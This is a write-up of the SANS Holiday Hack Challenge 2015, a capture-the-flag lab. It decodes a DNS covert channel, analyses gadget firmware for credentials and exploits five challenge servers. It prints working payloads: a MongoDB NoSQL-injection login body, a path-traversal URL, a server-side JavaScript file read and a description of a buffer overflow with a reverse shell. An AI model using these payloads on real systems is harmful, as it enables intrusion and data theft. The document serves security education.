Holiday Hack Challenge 2015 Writeup

Hey All! The following is my Challenges write-up for Holiday Hack 2015, submitted by quest player 'ahhh'! It all started with the interactive 'quest' mode. The first thing I did was fully explore it, reading what every character had to say and bookmarking all of the links for later. I also completed all of the quest-based tasks before moving on to the following set of Challenge questions. The quest game is mostly nontechnical, and it was covered in my previous Holiday Hack Quest post. The following deals with the technical challenges: the challenges write-up and my SANS final submission:

Part 1: Dance of the Sugar Gnome Fairies: Curious Wireless Packets

1) Which commands are sent across the Gnome’s command-and-control channel? 

After acquiring the pcap and analyzing it in Wireshark, it became clear the Gnome was using the DNS TXT record as a covert channel to hide data. I then extracted the base64 from the TXT records using tshark, finding the exact field name by highlighting it in Wireshark first:
tshark.exe -r giyh-capture.pcap -O DNS -Y "dns.flags.response == 1" -T fields -e dns.txt

1A) Decoding these base64 commands reveals a custom RAT protocol, which issues shell commands such as iwconfig and also reads a file that gathers wireless information about the RAT's environment. These commands are followed by a FILE command, which initiates a file transfer.

2) What image appears in the photo the Gnome sent across the channel from the Dosis home?

Running the scapy script provided to us in the quest game produces a dump of the FILE transfer command's payload. This dump still contains parts of the RAT's custom file transfer protocol, so we carve some ASCII data off the start and end of the file. In a hex editor, we can carve the JPEG out of the binary blob by trimming all of the data before the FFD8 start-of-image marker and all of the data after the FFD9 end-of-image marker.

2A) The photo we then reveal is a webcam shot taken by the Gnome device inside a home, spying on a room in the house, with the flag at the bottom of the photo, which reads: GnomeNET-NorthAmerica
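The two steps above (decoding the tshark TXT output, then carving the JPEG between the FFD8 and FFD9 markers) as an added Python example, not code from the original write-up. The sample TXT values and the EXEC:/FILE: framing are constructed assumptions; the real Gnome protocol's exact layout is not reproduced here.

```python
import base64

SOI, EOI = b"\xff\xd8", b"\xff\xd9"   # JPEG start-of-image / end-of-image markers

# Constructed stand-in for `tshark ... -e dns.txt` output, one base64 TXT value per
# line. The EXEC:/FILE: framing is an assumption, not the Gnome's real protocol.
SAMPLE_CHUNKS = [
    b"EXEC:iwconfig",
    b"FILE:/root/Pictures/snapshot_CURRENT.jpg",
    b"FILE:START_STATE",
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00constructed-image-bytes-",
    b"more-constructed-bytes\xff\xd9",
    b"FILE:STOP_STATE",
]
SAMPLE_TSHARK_OUTPUT = "\n".join(base64.b64encode(c).decode() for c in SAMPLE_CHUNKS)

def decode_txt_lines(text):
    """Base64-decode each non-empty line; keep undecodable lines raw so a
    malformed record is visible in the output instead of silently dropped."""
    decoded = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            decoded.append(base64.b64decode(line, validate=True))
        except ValueError:          # binascii.Error is a ValueError subclass
            decoded.append(line.encode())
    return decoded

def carve_jpegs(blob):
    """Return every JPEG in `blob`, from an SOI marker to the next EOI marker
    inclusive. An SOI with no following EOI is truncated data and is skipped."""
    images, pos = [], 0
    while (start := blob.find(SOI, pos)) >= 0:
        end = blob.find(EOI, start + len(SOI))
        if end < 0:
            break
        images.append(blob[start:end + len(EOI)])
        pos = end + len(EOI)
    return images

def analyse_capture(text):
    """Split decoded records into printable-ASCII command lines and carved images.
    The printable-ASCII test is a heuristic, not part of the Gnome's protocol."""
    decoded = decode_txt_lines(text)
    commands = [d.decode() for d in decoded if all(32 <= b < 127 for b in d)]
    return commands, carve_jpegs(b"".join(decoded))
```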

Part 2: I’ll be Gnome for Christmas: Firmware Analysis for Fun and Profit

3) What operating system and CPU type are used in the Gnome?  What type of web framework is the Gnome web interface built in?

Start by extracting the filesystem with squashfs-tools, using: unsquashfs giyh-firmware-dump.bin
We then find a Linux file system and several interesting details:
Ambarella S2Lm IP Camera Processor System-on-Chip
ARM Cortex A9 CPU
file sbin/sysctl
32-bit, ARM, EABI5 version 1
cat etc/openwrt_release
OpenWRT r47650

3A) 32-bit ARM (EABI5 version 1) running OpenWRT r47650 on an Ambarella S2Lm IP Camera Processor System-on-Chip. The web application is written in NodeJS, with numerous node_modules, and uses a MongoDB database. The Gnome firmware version is: GnomeIYH v1.1.8.164461
Gnome Serial Number: 20-RNG9731

4) What kind of a database engine is used to support the Gnome web interface? What is the plaintext password stored in the Gnome database?

4A) MongoDB. The password for mongodb is KTt9C1SljNKDiobKKro926frc (the same across the other SuperGnomes as well, as confirmed after using LFI on SG02).
The user passwords in MongoDB are stored in: opt/mongodb/gnome.0
We can read these using:
mongodump --dbpath opt/mongodb/; bsondump dump/gnome/users.bson
which gives us the username 'admin' and password 'SittingOnAShelf'

Part 3: Let it Gnome!  Let it Gnome!  Let it Gnome! Internet-Wide Scavenger Hunt

5) What are the IP addresses of the five SuperGnomes scattered around the world, as verified by Tom Hessman in the Dosis neighborhood?

Here we can use Shodan to search for specific header values in the banner of the firmware we analyzed: https://www.shodan.io/search?query=SuperGnome

5A)
SG1 - 52.2.229.189
SG2 - 52.34.3.80
SG3 - 52.64.191.71
SG4 - 52.192.152.132
SG5 - 54.233.105.81

Also of interest, the hostnames: supergnome1.atnascorp.com, sg1.atnascorp.com, supergnome.atnascorp.com, sg.atnascorp.com

6) Where is each SuperGnome located geographically?

6A) They are at various locations around the world, but all of them are hosted on Amazon, so this would be the best avenue for access:
SG1 - Ashburn, United States - Amazon
https://www.shodan.io/host/52.2.229.189
SG2 - Boardman, United States - Amazon
https://www.shodan.io/host/52.34.3.80
SG3 - Sydney, Australia - Amazon
https://www.shodan.io/host/52.64.191.71
SG4 - Tokyo, Japan - Amazon
https://www.shodan.io/host/52.192.152.132
SG5 - Brazil - Amazon
https://www.shodan.io/host/54.233.105.81

Part 4: There’s No Place Like Gnome for the Holidays: Gnomage Pwnage

7) Please describe the vulnerabilities you discovered in the Gnome firmware.

7A) Aside from looting the firmware for credentials, which we then found to be valid on other Gnome devices, the NodeJS web application had several notable vulnerabilities:
7A.1) MongoDB NoSQL injection in the login page. This can be found in the LOGIN POST function in 'index.js'.
7A.2) The Camera Viewer function in 'index.js' is vulnerable to Local File Inclusion
7A.3) The FILE UPLOAD function in 'index.js' is vulnerable to server side javascript command injection
7A.4) The SETTINGS UPLOAD function can be abused to create arbitrary directories and leak file location information on the server

8) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN IN THE DOSIS NEIGHBORHOOD, attempt to remotely exploit each of the SuperGnomes.  Describe the technique you used to gain access to each SuperGnome’s gnome.conf file. 

8A)
SG01 - We can login with default creds found in the previous MongoDB named gnome.0:
Gnome Serial Number: NCC1701
The key exploit details here are using the following credentials:
admin:SittingOnAShelf
http://52.2.229.189/files

SG02 - Create an arbitrary directory named .png via the settings upload, then use the Local File Inclusion in the camera viewer to traverse through that directory and on to files of our choosing:
Gnome Serial Number: XKCD988
The key exploit details here are:
First create a new file in settings called: .png/lol.lol
Then browse to:
http://52.34.3.80/cam?camera=../upload/sGfdbXhO/.png/../../../../files/factory_cam_2.zip
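The reason the '.png' directory trick works, and the check that stops it, as an added Python example that is not the SuperGnome's Node.js code. `weak_camera_path` is my reconstruction of a substring check consistent with the traversal above (an assumption), `CAM_ROOT` is an assumed directory, and `safe_camera_path` shows the containment check a fixed handler would apply.

```python
import posixpath

# Assumed location of the camera stills; the real SuperGnome path is not on the page.
CAM_ROOT = "/www/public/images"

def weak_camera_path(camera):
    """Reconstruction of the check the SG02 trick defeats: '.png' anywhere in the
    string passes, so a directory literally named '.png' satisfies it."""
    if ".png" not in camera:
        raise ValueError("rejected: not a png")
    return posixpath.join(CAM_ROOT, camera)

def safe_camera_path(camera):
    """Normalise first, then require the result to stay under CAM_ROOT and to
    name a .png file (suffix test on the final component, not a substring)."""
    if not camera or "\x00" in camera or camera.startswith("/"):
        raise ValueError("rejected: empty, NUL byte or absolute path")
    full = posixpath.normpath(posixpath.join(CAM_ROOT, camera))
    if posixpath.commonpath([CAM_ROOT, full]) != CAM_ROOT:
        raise ValueError("rejected: escapes the camera directory")
    name = posixpath.basename(full)
    if not name.endswith(".png") or name == ".png":
        raise ValueError("rejected: not a .png file name")
    # On a real filesystem also compare os.path.realpath() results to defeat symlinks.
    return full

def is_rejected(camera):
    """True when safe_camera_path refuses the request."""
    try:
        safe_camera_path(camera)
    except ValueError:
        return True
    return False

# The exact camera parameter from the SG02 request above.
PAGE_PAYLOAD = "../upload/sGfdbXhO/.png/../../../../files/factory_cam_2.zip"
```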

SG03 - NoSQL injection in Login, when sending a POST to http://52.64.191.71/
Gnome Serial Number: THX1138
The key exploit details here are setting the following in your POST request:
Content-Type:application/json

{
    "username": "admin",
    "password": {"$gt": ""}
}
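Why the `{"$gt": ""}` body above logs in, and the input check that closes it, as an added Python example rather than the SuperGnome's Node.js code. The `USERS` record is constructed from the credentials found in gnome.0, and `mongo_like_match` is a tiny stand-in for MongoDB's query matching, not the real driver.

```python
import hmac
import json

# Constructed users collection standing in for the gnome.0 data found in the firmware.
USERS = [{"username": "admin", "password": "SittingOnAShelf"}]

def mongo_like_match(stored, query):
    """Tiny subset of MongoDB matching: a plain value must be equal, while an
    operator object such as {"$gt": ""} is evaluated as a comparison."""
    if isinstance(query, dict):
        if "$gt" in query:
            return stored > query["$gt"]
        if "$ne" in query:
            return stored != query["$ne"]
        raise ValueError("unsupported operator")
    return stored == query

def vulnerable_login(body):
    """Feeds the decoded JSON straight into the query, the behaviour the SG03
    POST exploits: {"$gt": ""} is greater than every non-empty password."""
    creds = json.loads(body)
    return any(mongo_like_match(u["username"], creds.get("username"))
               and mongo_like_match(u["password"], creds.get("password"))
               for u in USERS)

def hardened_login(body):
    """Refuse anything that is not a plain string before it reaches the query,
    and compare in constant time. (Hashing the stored passwords, which gnome.0
    keeps in plaintext, is a separate fix.)"""
    creds = json.loads(body)
    user, pw = creds.get("username"), creds.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return any(u["username"] == user
               and hmac.compare_digest(u["password"].encode(), pw.encode())
               for u in USERS)
```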


SG04 - Server Side JavaScript Injection vuln in File Upload at http://52.192.152.132/:
Gnome Serial Number: BU22_1729_2716057
For the JS injection, I started with simple tests such as replacing the function call with "2+2".
The key exploit details here are calling the following in your request:
fs.readFileSync('.files/gnome.conf')

SG05 - Buffer overflow in the sgnet program listening on port 4242 of 54.233.105.81
Gnome Serial Number: 4CKL3R43V4
Connect to 4242. It is a buffer overflow with an executable stack and a stack canary.
Analyzing the source code they provide reveals a secret menu option which is vulnerable to a buffer overflow. You can also edit this code and rebuild the binary to get around the anti-debugging code more easily.
I decided to debug the server using peda-gdb and write my client using pwntools.
The key details require following the child process by calling the following:
(gdb) set follow-fork-mode child
(gdb) break sgnet_readn
Then we find the canary's location in the exploit, as well as where we overwrite EIP.
Next we need to get a ROP gadget for jmp esp!
Finally we add a reverse TCP shellcode
and boom! Reverse shell action :D, running as the unprivileged user nobody! I've included my exploit below for those who want to see the code: https://gist.github.com/ahhh/c1a281f676c6a1892f95.js


Part 5: Baby, It’s Gnome Outside: Sinister Plot and Attribution

9) Based on evidence you recover from the SuperGnomes’ packet capture ZIP files and any staticky images you find, what is the nefarious plot of ATNAS Corporation?

9A)

Based on the various emails and attachments found in the network transmissions recovered from each of the SuperGnomes, the plot of the ATNAS group and the purpose of the GnomeInYourHome devices became clear. The GnomeInYourHome toys are being planted in multiple houses to give thieves and crooks an internal audio / video feed of their potential future victims. In this way they can use the remote spying devices to locate the valuable targets and determine the best courses of action before ever setting foot onsite.

10) Who is the villain behind the nefarious plot?

10A)
Wooow, **spoiler alert**, 'Cindy Lou Who' is using The ATNAS Corporation and the SuperGnome jump boxes to let crooks spy on individuals, and then, conspiring with the thieves, they plan to break into the houses of victims on Christmas Eve dressed in Santa costumes to steal presents from little kids! Cindy is carrying this out to ruin Christmas and continue the Grinch's life work. Which is even sadder, as we learn on the final SuperGnome that the Grinch wrote Cindy Lou to apologize. This is a twisted Christmas plot.
For the full details, extract the emails out of the network transfers from the various SuperGnome servers.

And that's it ladies and gents! As you've probably seen, there are a bunch of these writeups out there; however, if you are looking for a more detailed explanation of each step I would recommend my friend Joe's writeup, which is detailed and easy to digest!